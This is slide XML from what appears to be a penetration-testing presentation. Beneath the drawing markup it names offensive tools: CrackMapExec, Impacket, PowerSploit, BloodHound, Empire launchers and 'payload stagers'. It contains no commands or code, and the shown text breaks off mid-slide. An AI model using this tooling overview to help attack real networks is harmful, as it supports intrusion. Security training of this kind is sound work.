              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="Straight Connector 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5196B406-7AD4-4EE4-8403-8699777F0386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="46" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5297172" y="5039989"/>
            <a:ext cx="1581729" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="Graphic 59" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A40206-5A27-44F4-A4F4-56BEC5B9E7E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892201" y="4610157"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Graphic 60" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57342524-EA37-4E5C-B681-C89E404B502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885104" y="3512307"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="Graphic 61" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E4BA135-B675-4C77-9E61-56D91B48908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857983" y="2275999"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Graphic 62" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84EA6B57-927F-4A66-8042-1C1D9DCFFAC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940483" y="1034972"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79" name="Straight Connector 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB73F408-F48D-489E-BBEB-716E48ACF667}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7675189" y="1583353"/>
            <a:ext cx="1200493" cy="2313769"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="80" name="Straight Connector 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CF11604-7FB3-4E9F-B544-0D6A15DB7CBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7675188" y="2805584"/>
            <a:ext cx="1200494" cy="1037702"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="81" name="Straight Connector 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01CA7729-E6D5-4591-89E4-5EE7B67F6526}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7580301" y="3843286"/>
            <a:ext cx="1238464" cy="116923"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82" name="Straight Connector 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{384F77EB-940E-4C6D-AE17-26747CD36946}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7683242" y="3843286"/>
            <a:ext cx="1192440" cy="1247220"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="89" name="Graphic 88" descr="Remote control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B06078C-847C-47C5-876A-60C08B6D568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123163" y="1724070"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="90" name="Graphic 89" descr="Remote control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{263D7585-A42F-4B15-BB4F-8F86BFB8517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568137" y="1722301"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="TextBox 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC9B4B5D-6991-4AE3-831F-E2FE714036D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9551441" y="633960"/>
            <a:ext cx="2033392" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Payload Stagers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="93" name="Straight Connector 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A6B1060-58F6-4320-A85B-9E6A98ECB173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="495147" y="830941"/>
            <a:ext cx="0" cy="2600538"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="41275">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="none" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="96" name="Straight Connector 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A603BC8A-F02E-43A6-B716-AF5245810F6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="495150" y="830941"/>
            <a:ext cx="8460167" cy="7952"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="41275">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="none" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="109" name="Straight Connector 108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6814F4B8-E12E-4509-83D7-31C89A657033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="10158238" y="3546400"/>
            <a:ext cx="610659" cy="26512"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="none" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="115" name="Straight Connector 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FA9A1C7-645C-42BD-B20B-36103FB8B7DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9552937" y="2591047"/>
            <a:ext cx="27426" cy="671992"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="none" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="118" name="Straight Connector 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FBF384B-CA07-4BBE-AC9D-C39568DEEB23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="90" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9872655" y="2636701"/>
            <a:ext cx="1152682" cy="636305"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="none" w="lg" len="lg"/>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90005946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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="-3961"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CrackMapExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBE3F07A-BC97-47FD-9310-1E95C276B77B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2159391" y="1385839"/>
            <a:ext cx="12192001" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>A swiss army knife for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> networks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Heavy use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20033D18-C8A2-4A56-BBD5-44EA3A096680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="545228"/>
            <a:ext cx="10065434" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/byt3bl33d3r/CrackMapExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC32958D-67FF-4CF5-94B1-7BB927B58370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="118361" y="2405575"/>
            <a:ext cx="12092723" cy="4452425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342807442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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="-3961"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CrackMapExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBE3F07A-BC97-47FD-9310-1E95C276B77B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="173910" y="1406856"/>
            <a:ext cx="6602985" cy="5324535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Slices, Dices, and Chops!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bloodhound</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Empire Launchers</a:t>
            </a:r>
          </a:p>
          <a:p>
